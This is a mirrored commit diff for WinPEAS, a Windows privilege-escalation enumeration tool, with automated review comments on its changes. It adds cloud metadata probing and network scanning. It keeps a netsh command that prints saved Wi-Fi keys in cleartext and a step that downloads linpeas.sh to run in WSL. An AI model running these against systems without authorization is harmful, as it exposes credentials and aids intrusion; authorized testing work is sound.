mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-20 12:39:21 +01:00

WinPEASS Big Update

This commit is contained in:
Carlos Polop 2024-08-27 22:08:48 +02:00
parent c37db4654c
commit b435119723
36 changed files with 1727 additions and 729 deletions

View File

@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file. of the GNU General Public License (GPL) is appended to this file.
peass-ng is (C) 2006-2022 Carlos Polop Martin. peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free the terms of the GNU General Public License as published by the Free

View File

@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission. All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
By Polop<sup>(TM)</sup>

View File

@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

View File

@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

View File

@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>

View File

@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
REM :: Code by PEASS-ng; Re-Write by ThisLimn0 REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides REM Registry scan of other drives besides
REM /////true or false REM /////true or false
@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
ECHO. by github.com/PEASS-ng ECHO. by carlospolop
ECHO. ECHO.
ECHO. ECHO.
@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds :WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI" CALL :ColorLine " %E%33m[+]%E%97m WIFI"
for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1 CALL :T_Progress 1
:BasicUserInfo :BasicUserInfo
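Review bot: the `for /f` change in `:WifiCreds` breaks profile names that contain spaces. With `delims=: ` the old `tokens=3,*` put the whole remainder of the line in `%%b`, whereas `tokens=4` puts only the first word of the SSID in `%%a`, so a profile called `Home Network` is queried as `name=Home` and `netsh` returns nothing. Keep the remainder token and quote it: `for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name="%%b" key=clear ...)`.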

View File

@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70) - [x] DNS Cache (limit 70)
- [x] Internet Settings - [x] Internet Settings
- **Cloud Metadata Enumeration**
- [x] AWS Metadata
- [x] GCP Metadata
- [x] Azure Metadata
- **Windows Credentials** - **Windows Credentials**
- [x] Windows Vault - [x] Windows Vault
- [x] Credential Manager - [x] Credential Manager
@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop

View File

@ -12,7 +12,7 @@ namespace winPEAS.Tests
try try
{ {
string[] args = new string[] { string[] args = new string[] {
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug" "systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
}; };
Program.Main(args); Program.Main(args);
} }
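Review bot: the new test argument `"cloud"` does not match the key registered for the new check, which is `"cloudinfo"` (see `new SystemCheck("cloudinfo", new CloudInfo())` and the help text added in this same commit). Arguments are matched against `systemCheckAllKeys`, so `"cloud"` will not select the check and the test does not exercise the cloud enumeration; use `"cloudinfo"`.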

View File

@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{ {
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" }, { 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" }, { 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" } { 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
}; };
// Get OS Build number // Get OS Build number
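Review bot: the two new entries `{ 22000, "21H2" }, { 22621, "22H2" }` are Windows 11 builds, but the labels collide with the Windows 10 releases of the same name (builds 19044 and 19045), which remain absent from the table together with 19043 (21H1). Either add those builds too or make the labels distinguishable (for example `"Win11 21H2"`) so that whatever consumes `version` downstream selects the right KB list.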
@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber)) if (!supportedVersions.ContainsKey(buildNumber))
{ {
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'"); Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
return;
} }
var version = supportedVersions[buildNumber]; var version = supportedVersions[buildNumber];
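Review bot: removing the `return;` after the "Windows version not supported" message makes the very next statement, `var version = supportedVersions[buildNumber];`, throw `KeyNotFoundException` for any build not in the dictionary, so the unsupported-build case now crashes instead of exiting cleanly. If the intent is to continue with the KB listing anyway, guard the lookup with `supportedVersions.TryGetValue(buildNumber, out var version)` and skip the version-dependent part; otherwise keep the early return.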
@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else else
{ {
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber"); Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
return;
} }
// List of KBs installed // List of KBs installed
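Review bot: the same applies to the removed `return;` after "Could not retrieve Windows BuildNumber": execution now falls through into the KB-listing code without a build number. Make sure every later use of the build number and of `version` is guarded for that case, or restore the early return.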

View File

@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good }, { (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ "Potentially sensitive file content:", Beaprint.ansi_color_bad },
}; };
string line = ""; string line = "";
@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod; line += "\n File: " + filepath_mod;
} }
if (app["isUnquotedSpaced"].ToLower() == "true") if (app["isUnquotedSpaced"].ToLower() != "false")
{ {
line += " (Unquoted and Space detected)"; line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
} }
if (!string.IsNullOrEmpty(app["interestingFileRights"])) if (!string.IsNullOrEmpty(app["interestingFileRights"]))
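Review bot: `if (app["isUnquotedSpaced"].ToLower() != "false")` inverts the previous positive test, so any value other than the literal `false`, including an empty string, now prints `(Unquoted and Space detected)` followed by an empty detail. If the producer can leave the key empty or unset, test `!string.IsNullOrEmpty(app["isUnquotedSpaced"]) && ... != "false"` instead, and consider a `ContainsKey` check like the one used for `sensitiveInfoList` in the next hunk.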
@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"]; line += "\n FilePerms: " + app["interestingFileRights"];
} }
if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
{
line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
}
Beaprint.AnsiPrint(line, colorsA); Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator(); Beaprint.PrintLineSeparator();
} }

View File

@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO; using System.IO;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Net;
using System.Security.Principal; using System.Security.Principal;
using winPEAS.Helpers; using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker; using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry; using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search; using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig; using winPEAS.Helpers.YamlConfig;
using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo; using winPEAS.Info.UserInfo;
namespace winPEAS.Checks namespace winPEAS.Checks
@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false; public static bool IsDebug = false;
public static bool IsLinpeas = false; public static bool IsLinpeas = false;
public static bool IsLolbas = false; public static bool IsLolbas = false;
public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false; public static bool SearchProgramFiles = false;
private static IEnumerable<int> PortScannerPorts = null;
private static string NetworkScanOptions = string.Empty;
// Create Dynamic blacklists // Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName; public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName; public static string CurrentUserDomainName = Environment.UserDomainName;
@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>(); private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>();
// github url for Linpeas.sh // github url for Linpeas.sh
public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh"; public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt"; public const string DefaultLogFile = "out.txt";
@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()), new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()), new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()), new SystemCheck("filesinfo", new FilesInfo()),
new SystemCheck("fileanalysis", new FileAnalysis()) new SystemCheck("fileanalysis", new FileAnalysis()),
new SystemCheck("cloudinfo", new CloudInfo())
}; };
var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key)); var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key));
@ -199,6 +206,52 @@ namespace winPEAS.Checks
} }
} }
if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
{
/*
-network="auto" - find interfaces/hosts automatically
-network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
-network="10.10.10.10/24" - scan host based on ip address/netmask
*/
if (!IsNetworkTypeValid(arg))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var parts = arg.Split('=');
string networkType = parts[1];
IsNetworkScan = true;
NetworkScanOptions = networkType;
}
if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
{
// e.g. -ports="80,443,8080"
var parts = arg.Split('=');
if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var portString = parts[1];
IEnumerable<int> ports = new List<int>();
try
{
PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll<int>(int.Parse);
}
catch (Exception)
{
Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
}
string argToLower = arg.ToLower(); string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower)) if (systemCheckAllKeys.Contains(argToLower))
{ {
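Review bot: the `-ports` branch requires `IsNetworkScan` to already be true, so `-ports` is only accepted when it appears after `-network` on the command line and otherwise fails with a message about `-network`, which will confuse users; collect both flags first and validate the combination once all arguments are parsed. Also, `IEnumerable<int> ports = new List<int>();` is never used, and `int.Parse` accepts values outside 0-65535, so validate the port range before handing the list to the scanner.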
@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug); CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
RunChecks(isAllChecks, wait); RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists(); SearchHelper.CleanLists();
@ -258,7 +311,58 @@ namespace winPEAS.Checks
} }
} }
private static void RunChecks(bool isAllChecks, bool wait) private static bool IsNetworkTypeValid(string arg)
{
var parts = arg.Split('=');
string networkType = string.Empty;
if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
{
networkType = parts[1];
// auto
if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
{
return true;
}
// netmask e.g. 10.10.10.10/24
else if (networkType.Contains("/"))
{
var rangeParts = networkType.Split('/');
if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
{
return true;
}
}
// list of ip addresses
else if (networkType.Contains(","))
{
var ips = networkType.Split(',');
try
{
var validIpsCount = ips.ToList().ConvertAll<IPAddress>(IPAddress.Parse).Count();
}
catch (Exception)
{
return false;
}
return true;
}
// single ip
else if (IPAddress.TryParse(networkType, out _))
{
return true;
}
}
return false;
}
private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{ {
for (int i = 0; i < _systemChecks.Count; i++) for (int i = 0; i < _systemChecks.Count; i++)
{ {
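Review bot: in `IsNetworkTypeValid` the netmask branch checks only the prefix length (`res <= 32 && res >= 0`) and never validates `rangeParts[0]` as an address, so `foo/24` is accepted; add `IPAddress.TryParse(rangeParts[0], out _)`. In the list branch `validIpsCount` is computed and discarded and exceptions are used for control flow; `return ips.All(ip => IPAddress.TryParse(ip.Trim(), out _));` expresses the same check without the try/catch.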
@ -274,6 +378,12 @@ namespace winPEAS.Checks
} }
} }
} }
if (isNetworkScan)
{
NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
scanner.Scan();
}
} }
private static void CreateDynamicLists(bool isFileSearchEnabled) private static void CreateDynamicLists(bool isFileSearchEnabled)

View File

@ -0,0 +1,93 @@
using System.Collections.Generic;
using winPEAS.Helpers;
using winPEAS.Info.CloudInfo;
namespace winPEAS.Checks
{
internal class CloudInfo : ISystemCheck
{
public void PrintInfo(bool isDebug)
{
Beaprint.GreatPrint("Cloud Information");
var cloudInfoList = new List<CloudInfoBase>
{
new AWSInfo(),
new AzureInfo(),
new GCPInfo()
};
foreach (var cloudInfo in cloudInfoList)
{
string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
Dictionary<string, string> colorsMS = new Dictionary<string, string>()
{
{ "Yes", Beaprint.ansi_color_bad },
};
Beaprint.AnsiPrint(line, colorsMS);
}
foreach (var cloudInfo in cloudInfoList)
{
if (cloudInfo.IsCloud)
{
Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
if (cloudInfo.IsAvailable)
{
foreach (var kvp in cloudInfo.EndpointDataList())
{
// key = "section", e.g. User, Network, ...
string section = kvp.Key;
var endpointDataList = kvp.Value;
Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
foreach (var endpointData in endpointDataList)
{
var colors = new Dictionary<string, string>
{
{ endpointData.EndpointName, Beaprint.GRAY }
};
string message;
if (!string.IsNullOrEmpty(endpointData.Data))
{
message = endpointData.Data;
// if it is a JSON data, add additional newline so it's displayed on a separate line
if (message.StartsWith("{"))
{
message = $"\n{message}\n";
}
if (endpointData.IsAttackVector)
{
colors.Add(message, Beaprint.ansi_color_bad);
}
else
{
colors.Add(message, Beaprint.ansi_color_gray);
}
}
else
{
message = "No data received from the metadata endpoint";
}
Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
}
Beaprint.GrayPrint("");
}
}
else
{
Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
}
}
}
}
}
}
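Review bot: in `PrintInfo` the per-endpoint `colors` dictionary, and with it the `IsAttackVector` branch that adds `ansi_color_bad`, is never used: the line is printed with `Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray)`, so attack-vector data gets no highlighting. Use `Beaprint.AnsiPrint(line, colors)` as the summary loop above does. Also `string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}")` formats twice; the interpolated string alone is enough and avoids a `FormatException` if a name ever contains braces.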

View File

@ -1,4 +1,4 @@
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Diagnostics; using System.Diagnostics;
using System.IO; using System.IO;
@ -97,9 +97,19 @@ namespace winPEAS.Checks
else else
{ {
foreach (var fold in file.FullPath.Split('\\').Skip(1)) foreach (var fold in file.FullPath.Split('\\').Skip(1))
{ {
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase); try
if (isFileFound) break; {
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
if (isFileFound) break;
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
}
}
} }
} }
} }
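Review bot: `catch (RegexMatchTimeoutException e)` declares `e` without using it (compiler warning); write `catch (RegexMatchTimeoutException)` as the `catch (System.IO.IOException)` change later in this file does. The same applies to the identical block in the next hunk. The debug message also says "regex unchecked in a file" for what is a folder-name match; say which it was, since the pattern that timed out is what a maintainer needs to fix.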
@ -111,7 +121,17 @@ namespace winPEAS.Checks
} }
else else
{ {
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase); try
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
}
}
} }
} }
@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound }; return new bool[] { false, somethingFound };
} }
private static List<string> SearchContent(string text, string regex_str, bool caseinsensitive) public static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
{ {
List<string> foundMatches = new List<string>(); List<string> foundMatches = new List<string>();
@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx; Regex rgx;
bool is_re_match = false; bool is_re_match = false;
try try
{ {
// Escape backslashes in the regex string
string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches" // Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive) if (caseinsensitive)
{ {
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120)); is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase); rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
} }
else else
{ {
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120)); is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim()); rgx = new Regex(escapedRegex);
} }
} }
catch (RegexMatchTimeoutException e) catch (RegexMatchTimeoutException e)
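Review bot: `string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");` changes the meaning of every pattern instead of "escaping" it: a rule `\d+` becomes `\\d+`, which matches a literal backslash followed by `d`, so any YAML rule using `\s`, `\d`, `\w`, `\.` or `\b` silently stops matching. If some rules contain literal backslashes, fix them in the rule file (or apply `Regex.Escape` only to literal fragments); do not double backslashes in a string that is already a regex. A unit test running one `\d`-based rule against sample text would catch this.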
@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}"); Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
} }
//}
return foundMatches; return foundMatches;
} }
@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults; foundRegexes[regex_obj.name][regex.name] = fileResults;
} }
} }
catch (Exception ex) catch (System.IO.IOException)
{ {
// Cannot read the file // Cannot read the file
} }
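Review bot: narrowing `catch (Exception ex)` to `catch (System.IO.IOException)` drops `UnauthorizedAccessException`, which is not an `IOException` subclass and is exactly what a low-privileged file search hits on protected files; one access-denied file will now abort the whole loop. Catch `UnauthorizedAccessException` alongside `IOException`.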
@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop(); timer.Stop();
TimeSpan timeTaken = timer.Elapsed; TimeSpan timeTaken = timer.Elapsed;
if (timeTaken.TotalMilliseconds > 20000) if (timeTaken.TotalMilliseconds > 10000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}"); Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
} }
} }
} }

View File

@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution"; const string distribution = "Distribution";
const string rootDirectory = "Root directory"; const string rootDirectory = "Root directory";
const string runWith = "Run command"; const string runWith = "Run command";
const string wslUser = "WSL user";
const string root = "root";
var colors = new Dictionary<string, string>(); var colors = new Dictionary<string, string>();
new List<string> new List<string> { linpeas, distribution, rootDirectory, runWith, wslUser, root }
{ .ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
linpeas,
distribution,
rootDirectory,
runWith
}.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below"); Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors); Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}"; string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs"; string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName"); string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" + Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
$" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" + $" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"", $" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors); colors);
Beaprint.PrintLineSeparator(); Beaprint.PrintLineSeparator();
} }
catch (Exception) { } catch (Exception ex) { }
} }
// try to run linpeas.sh in the default distribution // try to run linpeas.sh in the default distribution
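Review bot: `catch (Exception ex) { }` introduces an unused variable where the previous `catch (Exception) { }` had none; either drop `ex` or log it under `Checks.IsDebug`, as the regex timeout handlers added in this commit do.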
@ -328,7 +328,7 @@ namespace winPEAS.Checks
{ {
try try
{ {
WSL.RunLinpeas(Checks.LinpeasUrl); WSLHelper.RunLinpeas(Checks.LinpeasUrl);
} }
catch (Exception ex) catch (Exception ex)
{ {

View File

@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad }, { "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
}; };
if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"])) // we need to find first occurrence of the procinfo name
string processNameSanitized = procInfo["Name"].Trim().ToLower();
if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{ {
if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]])) if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{ {
procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]]; procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
} }
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good; colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
} }
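Review bot: the lookup now trims and lowercases the process name (`processNameSanitized`), so every key in `DefensiveProcesses.AVVendorsByProcess` must be lowercase or the dictionary must be built with `StringComparer.OrdinalIgnoreCase`; otherwise no vendor will ever match. As before, `colorsP[procInfo["Product"]] = ...` runs even when the vendor list is empty, and throws `KeyNotFoundException` if `procInfo` has no `Product` entry; move it inside the `Count > 0` branch.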

View File

@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds() static void PrintCachedCreds()
{ {
try try{
{
